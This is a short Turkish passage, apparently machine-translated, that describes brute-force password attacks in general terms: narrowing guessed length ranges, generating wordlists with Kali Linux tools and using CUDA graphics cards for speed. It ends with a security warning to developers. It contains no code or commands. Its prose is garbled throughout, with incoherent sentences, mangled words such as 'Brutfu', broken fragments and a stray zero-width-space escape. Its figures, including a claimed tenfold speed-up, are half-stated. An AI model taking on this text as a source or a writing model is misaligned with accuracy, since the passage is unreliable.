"Hacker'lar" nasıl çalışır? Çoğu durumda, ya da şifrenin bir bölümünü önceden düşünüyorlar ya da biliyorlar. Kullanıcı şifresinin kesinlikle 3 veya 5 karakterden oluşmayacağını varsaymak oldukça mantıklıdır. Bu tür şifreler sık \u200b\u200bsıklıklara neden olur. Çoğunlukla bilgisayar korsanları 5 ila 10 karakter arasında bir arasındadır ve belki de önceden bilinen birkaç karakter ekleyin. Daha sonra istenen aralıklarla şifreler oluşturun. Kali Linux dağılımında, bu gibi durumlar için bile programlar var. Ve Voila, saldırı artık uzun sürmeyecek, çünkü sözlüğün hacmi artık çok büyük değil. Ek olarak, bilgisayar korsanı ekran kartının gücünü kullanabilir. Bazıları CUDA sistemini desteklerken, bütünlüğün seyri zaten 10 kez artar. Ve burada saldırının öyle olduğunu görüyoruz. basit yol Bu oldukça gerçek. Ancak Brutfu sadece siteleri değil.
Sevgili geliştiriciler, asla bilgi güvenliği sistemini unutma, çünkü bugün devletler de dahil olmak üzere bu tür saldırılardan birçok kişi var. Ne de olsa, en büyük güvenlik açığı, her zaman bir yerde ya da yapılmaması gereken bir yerde dikkatini dağıtabilecek bir kişidir. Biz programcılar, ancak programlanmış makineler değiliz. Her zaman uyarıcı olun, çünkü bilgi kaybı ciddi sonuçları tehdit ediyor!